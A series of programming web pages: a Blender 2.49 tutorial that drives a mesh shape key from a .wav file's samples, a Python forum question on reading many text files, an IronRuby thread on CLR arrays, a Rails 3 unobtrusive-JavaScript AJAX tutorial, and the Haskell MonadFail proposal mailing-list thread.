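The blending between a base shape and a distorted shape described above is, per vertex, a plain linear interpolation. A minimal sketch outside Blender (the blend helper is illustrative, not Blender API):

```python
def blend(base, distorted, t):
    # Mix base and distorted vertex positions; t=0 gives the base shape,
    # t=1 the fully distorted shape, and values in between interpolate.
    return [tuple(b + t * (d - b) for b, d in zip(vb, vd))
            for vb, vd in zip(base, distorted)]

base      = [(0.0, 0.0, 0.0), (1.0, 0.0, 0.0)]
distorted = [(0.0, 0.0, 1.0), (1.0, 0.0, 2.0)]
print(blend(base, distorted, 0.5))  # → [(0.0, 0.0, 0.5), (1.0, 0.0, 1.0)]
```

Setting the shape key's IPO curve value for a frame is what supplies t at that frame.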
Manipulating sound files So now that we know how to animate shapes, our next goal is to find out how to add some sound to our mesh, or rather to determine at each frame how much the distorted shape should be visible. As mentioned in the previous section, Blender's API does not provide many tools for manipulating sound files. Basically, the Sound module provides us with ways to load and play a sound file but that's as far as it gets. There is no way to access individual points of the waveform encoded in the file. Fortunately, standard Python distributions come bundled with a wave module that provides us with the means to read files in the common .wav format. Although it supports only the uncompressed format, this will suffice as this format is very common and most audio tools, such as Audacity, can convert to this format. With this module we can open a .wav file, determine the sample rate and duration of the sound clip, and access individual samples. As we will see in the explanation of the following code, we still have to convert these samples to values that we can use as key values for our shape keys but the heavy lifting is already done for us. Code outline: Sound.py Armed with the knowledge on how to construct IPO curves and access .wav files, we might draw up the following code outline: - Determine if the active object has suitable shapes defined and provide a choice. - Let the user select a .wav file. - Determine the number of sound samples per second present in the file. - Calculate the number of animation frames needed based on the duration of the sound file and the video frame rate.
- Then, for each animation frame: - Average the sound samples occurring in this frame - Set the blend value of the chosen IPO curve to this (normalized) average The full code is available as Sound.py in sound000.blend and explained as follows: import Blender from Blender import Scene,Window,Draw from Blender.Scene import Render import struct import wave We start off by importing the necessary modules including Python's wave module to access our .wav file and the struct module that provides functions to manipulate the actual binary data that we get from the .wav file. Next, we define a utility function to pop up a menu in the middle of our screen. It behaves just like the regular PupMenu() function from the Draw module but sets the cursor to a position halfway across and along the screen with the help of the GetScreenSize() and SetMouseCoords() functions from Blender's Window module: def popup(msg): (w,h)=Window.GetScreenSize() Window.SetMouseCoords(w/2,h/2) return Draw.PupMenu(msg) The bulk of the work will be done by the function sound2active(). It will take two arguments—the filename of the .wav file to use and the name of the shape key to animate based on the information in the .wav file. First, we attempt to create a WaveReader object by calling the open() function of the wave module (highlighted). If this fails, we show the error in a pop up and quit: def sound2active(filename,shapekey='Pop out'): try: wr = wave.open(filename,'rb') except wave.Error,e: return popup(str(e)+'%t|Ok') Then we do some sanity checks: we first check if the .wav file is a MONO file. If you want to use a stereo file, convert it to mono first, for example with the free Audacity package (). Then we check if we are dealing with an uncompressed .wav file because the wave module cannot handle other types. (most .wav files are uncompressed but if needed, Audacity can convert them as well) and we verify that the samples are 16-bits. 
If any of these checks fail, we pop up an appropriate error message: c = wr.getnchannels() if c!=1 : return popup('Only mono files are supported%t|Ok') t = wr.getcomptype() w = wr.getsampwidth() if t!='NONE' or w!=2 : return popup('Only 16-bit, uncompressed files are supported%t|Ok') Now that we can process the file, we get its frame rate (the number of audio samples per second) and the total number of audio frames (with the somewhat confusingly named function getnframes() from the wave module, where a frame means a sample). Then, we read all of these samples as raw bytes and store them in the variable b. fr= wr.getframerate() n = wr.getnframes() b = wr.readframes(n) Our next task is to get the rendering context from the current scene to retrieve the number of video frames per second. The number of seconds our animation will play is determined by the length of our audio sample, something we can calculate by dividing the total number of audio frames in the .wav file by the number of audio frames per second (highlighted in the following piece of code). We then define a constant sampleratio—the number of audio frames per video frame: scn = Scene.GetCurrent() context = scn.getRenderingContext() seconds = float(n)/fr sampleratio = fr/float(context.framesPerSec()) As mentioned before, the wave module gives us access to a number of properties of a .wav file and the raw audio samples, but provides no functions to convert these raw samples to usable integer values. We therefore need to do this ourselves. Fortunately, this is not as hard as it may seem. Because we know that the 16-bit audio samples are present as 2 byte integers in the "little-endian" format, we can use the unpack() function from Python's struct module to efficiently convert the list of bytes to a list of integers by passing a fitting format specification. (You can read more about the way .wav files are laid out on.) samples = struct.unpack('<%dh'%n,b) Now we can start animating the shape key.
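The unpacking and per-video-frame averaging steps above can be tried outside Blender by synthesizing a one-second mono .wav in memory; the sine tone, sample rate, and frame rate below are arbitrary test values:

```python
import io
import math
import struct
import wave

RATE, FPS = 8000, 25   # audio samples per second, video frames per second
n = RATE               # one second of mono 16-bit audio
pcm = struct.pack('<%dh' % n,
                  *(int(16000 * math.sin(2 * math.pi * 440 * i / RATE))
                    for i in range(n)))

buf = io.BytesIO()
wr = wave.open(buf, 'wb')
wr.setnchannels(1)     # mono
wr.setsampwidth(2)     # 16-bit samples
wr.setframerate(RATE)
wr.writeframes(pcm)
wr.close()

buf.seek(0)
rd = wave.open(buf, 'rb')
n = rd.getnframes()
# The same unpack call the script uses: n little-endian signed shorts
samples = struct.unpack('<%dh' % n, rd.readframes(n))
sampleratio = rd.getframerate() / float(FPS)
averages = [sum(samples[int((i - 1) * sampleratio):int(i * sampleratio)]) / sampleratio
            for i in range(1, int(n / sampleratio) + 1)]
print(len(averages))  # → 25, one average per video frame
```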
We get the start frame from the rendering context and calculate the end frame by multiplying the number of seconds in the .wav file by the video frame rate. Note that this may be longer or shorter than the end frame we would get from the rendering context. The latter determines the last frame that will get rendered when the user clicks the Anim button, but we will animate the movement of our active object regardless of this value.

Then, for each frame from start frame to end frame (exclusive), we calculate the average value of the audio samples occurring in that video frame by summing those audio samples (present in the samples list) and dividing them by the number of audio samples per video frame (highlighted in the next code snippet). We will set the chosen shape key to a value in the range [0:1], so we have to normalize the calculated averages by determining the minimum and maximum values and calculating a scale:

    staframe = context.startFrame()
    endframe = int(staframe + seconds*context.framesPerSec())
    popout=[]
    for i in range(staframe,endframe):
        popout.append(sum(samples[int((i-1)*sampleratio):int(i*sampleratio)])/sampleratio)
    minvalue = min(popout)
    maxvalue = max(popout)
    scale = 1.0/(maxvalue-minvalue)

Finally, we get the active object in the current scene and get its Shape IPO (highlighted). We conclude by setting the value of the shape key for each frame in the range we are considering to the scaled average of the audio samples:

    ob=Blender.Scene.GetCurrent().objects.active
    ipo = ob.getData().getKey().getIpo()
    for i,frame in enumerate(range(staframe,endframe)):
        ipo[shapekey][frame]=(popout[i]-minvalue)*scale

The remaining script itself is now rather simple. It fetches the active object and then tries to retrieve a list of shape key names from it (highlighted in the next part). This may fail (hence the try ...
except clause) if, for example, the active object is not a mesh or has no associated shape keys, in which case we alert the user with a pop up:

    if __name__ == "__main__":
        ob=Blender.Scene.GetCurrent().objects.active
        try:
            shapekeys = ob.getData().getKey().getIpo().curveConsts
            key = popup('Select a shape key%t|'+'|'.join(shapekeys))
            if key>0:
                Window.FileSelector(lambda f:sound2active(f,shapekeys[key-1]),
                                    "Select a .wav file",
                                    Blender.Get('soundsdir'))
        except:
            popup('Not a mesh or no shapekeys defined%t|Ok')

If we were able to retrieve a list of shape keys, we present the user with a pop-up menu to choose from this list. If the user selects one of the items, key will be positive and we present the user with a file selector dialog (highlighted). This file selector dialog is passed a lambda function that will be called if the user selects a file, with the name of the selected file as an argument. In our case we construct this lambda function to call the sound2active() function defined previously with this filename and the selected shape key.

The initial directory presented to the user in the file selector is determined by the last argument to the FileSelector() function. We set it to the contents of Blender's soundsdir parameter. This is usually // (that is, a relative path pointing to the same directory as the .blend file the user is working on) but may be set to something else in the user preferences window (File Paths section).

Animating a mesh by a .wav file: the workflow

Now that we have our Sound.py script, we can apply it as follows:

- Select a Mesh object.
- Add a "Basis" shape key to it (Buttons window, Editing context, Shapes panel). This will correspond to the least distorted shape of the mesh.
- Add a second shape key and give it a meaningful name.
- Edit this mesh to represent the most distorted shape.
- In object mode, run Sound.py from the text editor by pressing Alt + P.
- Select the shape key name defined earlier (not the "Basis" one) from the pop up.
- Select the .wav file to apply.

The result will be an object with an IPO curve for the chosen shape key that fluctuates according to the beat of the sound, as shown in the next screenshot.

Summary

In this article we saw how to associate shape keys with a mesh and how to add an IPO to animate transitions between those shape keys. Specifically, we learned how to:

- Define IPOs
- Define shape keys on a mesh
- Define IPOs for those shape keys
- Pose armatures
- Group changes in poses into actions

If you have read this article, you may be interested to view:

- Blender 2.49 Scripting: Animating the Visibility of objects
- Blender 2.49 Scripting: Impression using Different Mesh on Each Frame of Object
https://www.packtpub.com/books/content/blender-249-scripting-shape-keys-ipos-and-poses
Hi

I know how to import an individual file:

    def cvt(s,default=-1):
        try:
            return float(s)
        except ValueError:
            return default

    import csv
    with open("Dealer1.txt", "rb") as csvfile:
        reader = csv.reader(csvfile, delimiter="\t")
        data = list(reader)

I have a folder that contains 50+ files. Using glob, I created the following code:

    import os
    import glob
    os.chdir('c:/Performance')
    files = glob.glob('*.txt')
    print files

Now, is there a way that instead of importing individual files I can import all 50 files' data at the same time? All 50 have the same layout. Can I import all the data from the txt files in one go?

Jezza
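One way to approach the question above is simply to loop over the glob result and collect each file's rows into a dictionary keyed by filename. The sketch below is written for Python 3 (the post uses Python 2), and the function name and folder path are illustrative, not from the original post:

```python
import csv
import glob
import os

def load_all(folder, pattern='*.txt'):
    # Read every matching tab-delimited file into a dict: filename -> list of rows.
    data = {}
    for path in glob.glob(os.path.join(folder, pattern)):
        with open(path, newline='') as f:
            data[os.path.basename(path)] = list(csv.reader(f, delimiter='\t'))
    return data

# e.g. all_data = load_all('c:/Performance')
# all_data['Dealer1.txt'] would then hold that file's rows.
```

If the files should instead be combined into one flat list of rows, replace the dictionary with `rows.extend(...)` inside the loop.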
http://forums.devshed.com/python-programming/936485-importing-50-txt-files-python-last-post.html
Hello,

C#:

    public class Cls {
        public void foo(object a) {
            Console.WriteLine("foo #1");
        }
        public void foo(object[] a) {
            Console.WriteLine("foo #2");
        }
    }

Ruby:

    Cls.new.foo(7)
    Cls.new.foo([3, 4])

Output:

    foo #1
    foo #1   <-- Calling foo(object a) again

So how can I call foo(object[] a)?

- Alex on 2009-01-09 17:16

on 2009-01-09 18:34

You'll need to build a CLR array rather than a Ruby array.

    require 'mscorlib'
    o = System::Array.create_instance(System::Object.to_clr_type, 2)
    >>> o[0] = 3
    >>> o[1] = 4

You can monkey-patch Array and add this as a helper:

    class Array
      def to_clr_ary
        o = System::Array.create_instance(System::Object.to_clr_type, length)
        each_with_index { |obj, i| o[i] = obj }
        o
      end
    end

CLR arrays and Ruby arrays are totally different; Ruby arrays are much more similar to "List<object>" than to "object[]". So it's unlikely that IronRuby would ever do this conversion automatically for you.

on 2009-01-09 18:41

[3,4] is not an array of objects. It's a RubyArray. You can create a CLR array like this:

    v = System::Array.of(Object).new(3)
    [1,2,3].each_with_index { |x,i| v[i] = x }

Tomas

on 2009-01-09 21:12

Thank you!
https://www.ruby-forum.com/topic/175325
As I mentioned in my previous Ruby on Rails tutorial, Unobtrusive JavaScript (UJS) is one of the coolest new features in Rails 3. UJS allows Rails-generated code to be much cleaner, helps separate your JavaScript logic from your HTML layouts, and uncouples Rails from the Prototype JavaScript library. In this tutorial, we're going to look at these features and learn how to use them in a simple Rails 3 application.

Background: What is Unobtrusive JavaScript?

To start off, what exactly is UJS? Simply, UJS is JavaScript that is separated from your HTML markup. The easiest way to describe UJS is with an example. Take an onclick event handler; we could add it obtrusively:

    <a href='#' onclick='alert("Inline JavaScript")'>Link</a>

Or we could add it unobtrusively by attaching the event to the link (using jQuery in this example):

    <a href='#'>Link</a>
    <script>
      $('a').bind('click', function() { alert('Unobtrusive!'); });
    </script>

As mentioned in my introduction, this second method has a variety of benefits, including easier debugging and cleaner code.

Up until version 3, Ruby on Rails generated obtrusive JavaScript. The resulting code wasn't clean, but even worse, it was tightly coupled to the Prototype JavaScript framework. This meant that unless you created a plugin or hacked Rails, you had to use the Prototype library with Rails' JavaScript helper methods. Rails 3, on the other hand, is JavaScript framework agnostic. In other words, you can use your JavaScript framework of choice, provided a Rails UJS implementation exists for that framework.

Rails 3 now implements all of its JavaScript helper functionality (AJAX submits, confirmation prompts, and so on) unobtrusively by adding the following HTML 5 custom attributes to HTML elements.
- data-method - the REST method to use in form submissions.
- data-confirm - the confirmation message to use before performing some action.
- data-remote - if true, submit via AJAX.
- data-disable-with - disables form elements during a form submission.

For example, this link tag:

    <td><a href="/posts/2" class="delete_post" data-confirm="Are you sure?" data-method="delete" data-remote="true">Destroy</a></td>

would send an AJAX delete request after asking the user "Are you sure?". You can imagine how much harder that would be to read if all of that JavaScript were inline.

Now that we've reviewed UJS and how Rails implements UJS, let's set up a project and look at some specific applications. We'll be using the jQuery library and UJS implementation in this tutorial.

Step 1: Setting up the Project

Since we're creating a new project from scratch, the first thing we need to do is create the project by typing the following:

    rails new blog --skip-prototype

Notice that I'm instructing Rails to skip the prototype JavaScript file, since I'm going to be using the jQuery library. Let's start the server just to make sure everything appears to be working. And, voila!

Now that we've set up our project, we need to add jQuery and the jQuery UJS to our project. You are free to organize your JavaScript however you want, but the Rails convention for structuring your JavaScript files is as follows (all these files go in public/javascripts):

- framework JavaScript file (jquery.js, prototype.js, or mootools.js)
- rails.js - the code implementing Rails UJS (for whatever framework you've chosen)
- application.js - your application JavaScript

If you haven't already, download jquery.js (or refer to a CDN) and rails.js and include them in your public/javascripts directory. The last thing we need to do to get up and running is to tell Rails to include these js files on each of our pages.
To do this, open application.rb in your config directory and add the following line:

    config.action_view.javascript_expansions[:defaults] = %w(jquery rails application)

This configuration item tells Rails to include the three JavaScript files mentioned above by default. Alternatively, you could grab jQuery from a CDN by manually including a script tag pointing to the correct location. If you do this, be sure to remove 'jquery' from the javascript_expansions configuration item.

Step 2: Generating Some Code

To demonstrate the Rails UJS functionality, we first need some code to work with. For this demo we're just going to have a simple Post object. Let's generate that now:

    rails generate scaffold Post name:string title:string content:text

And then let's migrate our database to create the posts table:

    rake db:migrate

OK, we're good to go! If we navigate to the new Post page, we should see a form to create a new Post. It's all working! Now let's dig in and see how to use the UJS and AJAX functionality baked into Rails.

Step 3: Adding AJAX

Now that all the required JavaScript files are being included, we can actually start using Rails 3 to implement some AJAX functionality. Although you can write all of the custom JavaScript that you want, Rails provides some nice built-in methods that you can use to easily perform AJAX calls and other JavaScript actions. Let's look at a couple of commonly used Rails helpers and the JavaScript they generate.

AJAX Form Submission and JavaScript ERB Files

If we look at our Posts form, we can see that whenever we create or edit a Post, the form is manually submitted and then we're redirected to a read-only view of that Post. What if we wanted to submit that form via AJAX instead of using a manual submission? Rails 3 makes it easy to convert any form to AJAX.
First, open your _form.html.erb partial in app/views/posts, and change the first line from:

    <%= form_for(@post) do |f| %>

to:

    <%= form_for(@post, :remote => true) do |f| %>

Prior to Rails 3, adding :remote => true would have generated a bunch of inline JavaScript inside the form tag, but with Rails 3 UJS, the only change is the addition of an HTML 5 custom attribute. Can you spot it?

    <form accept-charset="UTF-8" action="/posts" class="new_post" data-remote="true" id="new_post" method="post">

The attribute is data-remote="true", and the Rails UJS JavaScript binds to any forms with that attribute and submits them via AJAX instead of a traditional POST.

That's all that's needed to do the AJAX submit, but how do we perform a callback after the AJAX call returns? The most common way of handling a return from an AJAX call is through the use of JavaScript ERB files. These work exactly like your normal ERB files, but contain JavaScript code instead of HTML. Let's try it out.

The first thing we need to do is to tell our controller how to respond to AJAX requests. In posts_controller.rb (app/controllers) we can tell our controller to respond to an AJAX request by adding format.js in each respond_to block that we are going to call via AJAX. For example, we could update the create action to look like this:

    def create
      @post = Post.new(params[:post])
      respond_to do |format|
        if @post.save
          format.html { redirect_to(@post, :notice => 'Post created.') }
          format.js
        else
          format.html { render :action => "new" }
          format.js
        end
      end
    end

Because we didn't specify any options in the respond_to block, Rails will respond to JavaScript requests by loading a .js ERB view with the same name as the controller action (create.js.erb, in this case). Now that our controller knows how to handle AJAX calls, we need to create our views. For the current example, add create.js.erb in your app/views/posts directory. This file will be rendered and the JavaScript inside will be executed when the call finishes.
For now, we'll simply overwrite the form tag with the title and contents of the blog post:

    $('body').html("<h1><%= escape_javascript(@post.title) %></h1>").append("<%= escape_javascript(@post.content) %>");

Now if we create a new Post, we get the result directly on the screen. Success!

The advantage of this method is that you can intersperse Ruby code that you set up in your controller with your JavaScript, making it really easy to manipulate your view with the results of a request.

AJAX Callbacks Using Custom JavaScript Events

Each Rails UJS implementation also provides another way to add callbacks to our AJAX calls: custom JavaScript events. Let's look at another example. On our Posts index view, we can see that each post can be deleted via a delete link. Let's AJAXify our link by adding :remote => true and additionally giving it a CSS class so we can easily find this post using a CSS selector:

    <td><%= link_to 'Destroy', post, :confirm => 'Are you sure?', :method => :delete, :remote => true, :class => 'delete_post' %></td>

which produces the following output:

    <td><a href="/posts/2" class="delete_post" data-confirm="Are you sure?" data-method="delete" data-remote="true">Destroy</a></td>

Each Rails UJS AJAX call provides six custom events that can be attached to:

- ajax:before - right before the ajax call
- ajax:loading - before the ajax call, but after the XmlHttpRequest object is created
- ajax:success - successful ajax call
- ajax:failure - failed ajax call
- ajax:complete - completion of the ajax call (after ajax:success and ajax:failure)
- ajax:after - after the ajax call is sent (note: not after it returns)

In our case we'll add an event listener to the ajax:success event on our delete links, and make the deleted post fade out rather than reloading the page. We'll add the following JavaScript to our application.js file:

    $('.delete_post').bind('ajax:success', function() {
      $(this).closest('tr').fadeOut();
    });

We'll also need to tell our posts_controller not to try to render a view after it finishes deleting the post.
    def destroy
      @post = Post.find(params[:id])
      @post.destroy
      respond_to do |format|
        format.html { redirect_to(posts_url) }
        format.js { render :nothing => true }
      end
    end

Now when we delete a Post it will gradually fade out.

Conclusion

Well, there you have it. Now you know how to make AJAX calls using Rails 3 UJS. While the examples explained here were simple, you can use these same techniques to add all kinds of interactivity to your project. I hope you'll agree that it's a big improvement over previous versions, and that you'll try it out on your next Rails project. What techniques do you use when implementing AJAX in Rails?
http://code.tutsplus.com/tutorials/using-unobtrusive-javascript-and-ajax-with-rails-3--net-15243
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello *,

the subject says it all. After we successfully put `Applicative =>` into `Monad`, it is time to remove something in return: `fail`.

Like with the AMP, I wrote up the proposal in Markdown format on Github, which you can find at the URL below, and in verbatim copy at the end of this email. It provides an overview of the intended outcome, which design decisions we had to take, and what our initial plan for the transition looks like. There are also some issues left open to discussion.

Here's a short abstract:

- Move `fail` from `Monad` into a new class `MonadFail`.
- Code using failable patterns will receive a more restrictive `MonadFail` constraint. Code without this constraint will be safe to use for all Monads.
- Transition will take at least two GHC releases. GHC 7.12 will include the new class, and generate warnings asking users to make their failable patterns compliant.
- Stackage showed an upper bound of less than 500 breaking code fragments when compiled with the new desugaring.

For more details, refer to the link or the paste at the end.

Let's get going!
David aka quchen

===============================================================
===============================================================
===============================================================

The proposal will also be posted on the ghc-devs@ and libraries@ mailing lists, as well as on Reddit.
Overview
--------

- **The problem** - reason for the proposal
- **MonadFail class** - the solution
- **Discussion** - explaining our design choices
- **Adapting old code** - how to prepare current code to transition smoothly
- **Estimating the breakage** - how much stuff we will break (spoiler: not much)
- **Transitional strategy** - how to break as little as possible while transitioning
- **Current status**

The problem
-----------

Currently, the `<-` symbol is unconditionally desugared as follows:

```haskell
do pat <- computation     >>>     let f pat = more
   more                   >>>         f _ = fail "..."
                          >>>     in  computation >>= f
```

The problem with this is that `fail` cannot (!) be sensibly implemented for many monads, for example `State`, `IO`, `Reader`. In those cases it defaults to `error`. As a consequence, in current Haskell, you can not use `Monad`-polymorphic code safely, because although it claims to work for all `Monad`s, it might just crash on you.

The goal of this proposal is inserting the `fail` call only when necessary, and reflecting that in the type signature of the `do` block, so that a `do` block without failable patterns is guaranteed not to call `fail`.

MonadFail class
---------------

To fix this, introduce a new typeclass:

```haskell
class Monad m => MonadFail m where
    fail :: String -> m a
```

Desugaring can then produce this constraint only when a pattern match can actually fail. The most trivial examples of unfailable patterns are those that match anywhere unconditionally:

```haskell
do x <- action     >>>     let f x = more
   more            >>>     in  action >>= f
```

In particular, the programmer can assert any pattern be unfailable by making it irrefutable using a prefix tilde:

```haskell
do ~pat <- action     >>>     let f ~pat = more
   more               >>>     in  action >>= f
```

A class of patterns that are conditionally failable are `newtype`s, and single constructor `data` types, which are unfailable by themselves, but may fail if matching on their fields is done with failable patterns:

```haskell
newtype Newtype a = Newtype a

do Newtype pat <- action     -- fails iff "pat" is a failable pattern
   more
```

Pattern synonyms count as failable patterns, so they desugar with a `fail` clause:

```haskell
do PatternSynonym x <- action     >>>     let f (PatternSynonym x) = more
   more                           >>>         f _ = fail "..."
                                  >>>     in  action >>= f
```

Discussion
----------

- Although for many `MonadPlus` `fail _ = mzero`, a separate `MonadFail` class should be created instead of just using that.

  - A parser might fail with an error message involving positional information. Some libraries, like `Binary`, provide `fail` as their only interface to fail a decoding step.
  - Although `STM` is `MonadPlus`, it uses the default `fail = error`.
It will therefore not get a `MonadFail` instance.

- What laws should `fail` follow? **Left zero**,

  ```haskell
  ∀ s f. fail s >>= f ≡ fail s
  ```

  A call to `fail` should abort the computation. In this sense, `fail` would become a close relative of `mzero`. It would work well with the common definition `fail _ = mzero`, and give a simple guideline to the intended usage and effect of the `MonadFail` class.

- Rename `fail`? **No.** Old code might use `fail` explicitly and we might avoid breaking it, the Report talks about `fail`, and we have a solid migration strategy that does not require a renaming.

- Remove the `String` argument? **No.** The `String` might help error reporting and debugging. `String` may be ugly, but it's the de facto standard for simple text in GHC. No high performance string operations are to be expected with `fail`, so this breaking change would in no way be justified. Also note that explicit `fail` calls would break if we removed the argument.

- How sensitive would existing code be to subtle changes in the strictness behaviour of `do` notation pattern matching? **It isn't.** The implementation does not affect strictness at all, only the desugaring step. Care must be taken when fixing warnings by making patterns irrefutable using `~`, as that *does* affect strictness. (Cf. difference between lazy/strict State)

- The `Monad` constraint for `MonadFail` seems unnecessary. Should we drop or relax it? What other things should be considered?

  - Applicative `do` notation is coming sooner or later, and `fail` might be useful in this more general scenario. Due to the AMP, it is trivial to change the `MonadFail` superclass to `Applicative` later. (The name will be a bit misleading, but it's a very small price to pay.)
  - The class might be misused for a strange pointed type if left without any constraint. This is not the intended use at all.
I think we should keep the `Monad` superclass for three main reasons:

- We don't want to see `(Monad m, MonadFail m) =>` all over the place.
- The primary intended use of `fail` is for desugaring do-notation anyway.
- Retroactively removing superclasses is easy, but adding them is hard (see AMP).

Adapting old code
-----------------

- Help! My code is broken because of a missing `MonadFail` instance!

  *Here are your options:*

  1. Write a `MonadFail` instance (and bring it into scope)

     ```haskell
     #if !MIN_VERSION_base(4,11,0)
     -- Control.Monad.Fail import will become redundant in GHC 7.16+
     import qualified Control.Monad.Fail as Fail
     #endif
     import Control.Monad

     instance Monad Foo where
       (>>=) = <...bind impl...>
       -- NB: `return` defaults to `pure`
     #if !MIN_VERSION_base(4,11,0)
       -- Monad(fail) will be removed in GHC 7.16+
       fail = Fail.fail
     #endif

     instance MonadFail Foo where
       fail = <...fail implementation...>
     ```

  2. Change your pattern to be irrefutable

  3. Emulate the old behaviour by desugaring the pattern match by hand:

     ```haskell
     do Left e <- foobar
        stuff
     ```

     becomes

     ```haskell
     do x <- foobar
        e <- case x of
            Left e' -> return e'
            Right r -> error "Pattern match failed"  -- Boooo
        stuff
     ```

     The point is you'll have to do your dirty laundry yourself now if you have a value that *you* know will always match, and if you don't handle the other patterns you'll get incompleteness warnings, and the compiler won't silently eat those for you.

- Help! My code is broken because you removed `fail` from `Monad`, but my class defines it!

  *Delete that part of the instance definition.*

Estimating the breakage
-----------------------

Using our initial implementation, I compiled stackage-nightly and grepped the logs for the "invalid use of fail desugaring" warnings; the results are collected at [stackage-logs]. Search for "failable pattern" to find your way to the still pretty raw warnings.
Transitional strategy
---------------------

The roadmap is similar to the [AMP][amp], the main difference being that since `MonadFail` does not exist yet, we have to introduce new functionality and then switch to it.

1. **GHC 7.12 / base-4.9**

   - Add module `Control.Monad.Fail` with the new class `MonadFail(fail)` so people can start writing instances for it. `Control.Monad` only re-exports the class `MonadFail`, but not its `fail` method. NB: At this point, `Control.Monad.Fail.fail` clashes with `Prelude.fail` and `Control.Monad.fail`.
   - *(non-essential)* Add a language extension `-XMonadFail` that changes desugaring to use `MonadFail(fail)` instead of `Monad(fail)`. This has the effect that typechecking will infer a `MonadFail` constraint for `do` blocks with failable patterns, just as it is planned to do when the entire thing is done.
   - Warn when a `do`-block that contains a failable pattern is desugared, but there is no `MonadFail` instance in scope: "Please add the instance or change your pattern matching." Add a flag to control whether this warning appears.
   - Warn when an instance implements the `fail` function (or when `fail` is imported as a method of `Monad`), as it will be removed from the `Monad` class in the future. (See also [GHC #10071][trac-10071])

2. GHC 7.14

   - Switch `-XMonadFail` on by default.
   - Remove the desugaring warnings.

3. GHC 7.16

   - Remove `-XMonadFail`, leaving its effects on at all times.
   - Remove `fail` from `Monad`.
   - Instead, re-export `Control.Monad.Fail.fail` as `Prelude.fail` and `Control.Monad.fail`.
   - `Control.Monad.Fail` is now a redundant module that can be considered deprecated.

Current status
--------------

- [ZuriHac 2015 (29.5. - 31.5.)][zurihac]: Franz Thoma (@fmthoma) and me (David Luposchainsky aka @quchen) started implementing the MFP in GHC.

  - Desugaring to the new `fail` can be controlled via a new language extension, `MonadFailDesugaring`.
  - If the language extension is turned off, a warning will be emitted for code that would break if it was enabled.
  - Warnings are emitted for types that *have* a *MonadFail* instance. This still needs to be fixed.
  - The error messages are readable, but should be more so. We're still on this.

- 2015-06-09: Estimated breakage by compiling Stackage. Smaller than expected.

[amp]:
[stackage-logs]:
[trac-10071]:
[zurihac]:

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBAgAGBQJVd0/yAAoJELrQsaT5WQUshbUH/A3W0itVAk7ao8rtxId5unCJ
7StriKVkTyLAkkrbRJngM4MHEKiCsoyIgr8kBIwSHgk194GxeP2NCF4ijuBZoDBt
+Uci+6BCBinV8+OzfrfTcJb4+8iw1j+eLWJ/Nz/JDMDNCiyzyC0SMsqGa+ssOz7H
/2mqPkQjQgpHuP5PTRLHKPPIsayCQvTbZR1f14KhuMN2SPDE+WY4rqugu//XuIkN
u1YssIf5l8mEez/1ljaqGL55cTI0UNg2z0iA0bFl/ajHaeQ6mc5BAevWfSohAMW7
7PIt13p9NIaMHnikmI+YJszm2IEaXuv47mGgbyDV//nHq3fwWN+naB+1mPX2eSU=
=vPAL
-----END PGP SIGNATURE-----

_______________________________________________
Libraries mailing list
[hidden email]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 10.06.2015 00:26, Johan Tibell wrote:
> ?

I don't have hard evidence, but the Monad class being partial strikes me as pretty backwards in a language where totality and no implicit failures are important to the programmers. We try our best to advocate not using certain functions like "head" carelessly, but do-notation comes with similar partiality. One concrete example that I know of is bimap, but that's something I stumbled upon months ago by accident. Another is that Binary does not have a monomorphic "fail" function, and it hurts me a bit to use the Monad "fail" and write a comment on how that is safe to do in the current context.

I think there are two important consequences of MonadFail. First of all, we can all safely write failable patterns if we so desire. Second, the compiler can ensure other people's codebases do not lie to us (knowingly or unknowingly).
David/quchen

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBAgAGBQJVd2vEAAoJELrQsaT5WQUs+m8IAOWA9Hd52MG1wZ6g6FoOcXd6
x64dRDlilmkVu2IRxHADzip75Oji254yKQ5VY9yMGjYpFajtgf0Q8LrmA0ePTzhg
E/oxdm1vyRoJab1C5TfdrzPM/voP+wHi7y2ak1j0hTNky+wETj4MKtJ/Jef225nd
APUq05t6nPwzEDCz37RitfbA6/nwwYShaVjNe0tRluPrJuxdBu0+aobFc2lzVL+s
J7egnV1kqEOhc7INOhWYsvAJPAJSiY950y/Nmxb2/r5orTfN3tsr98d1zwRxhCmq
UNXhUaj5xD7BK2Rn1Zy7VwUv1T8IRLZuOQrlZh3HWz4t1SI0tTu3tdS468s/B1g=
=4mEU
-----END PGP SIGNATURE-----

_______________________________________________
Libraries mailing list
[hidden email]

Thanks for putting this together. The proposal says: ?

_______________________________________________
ghc-devs mailing list
[hidden email]

On 06/09/2015 10:43 PM, David Luposchainsky wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1

+1

I'll add my token +1 to the landslide.

On Tue, Jun 9, 2015 at 11:19 PM, Bardur Arantsson <[hidden email]> wrote:
> On 06/09/2015 10:43 PM, David Luposchainsky wrote:
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>
> +1
http://haskell.1045720.n5.nabble.com/MonadFail-proposal-MFP-Moving-fail-out-of-Monad-td5810937.html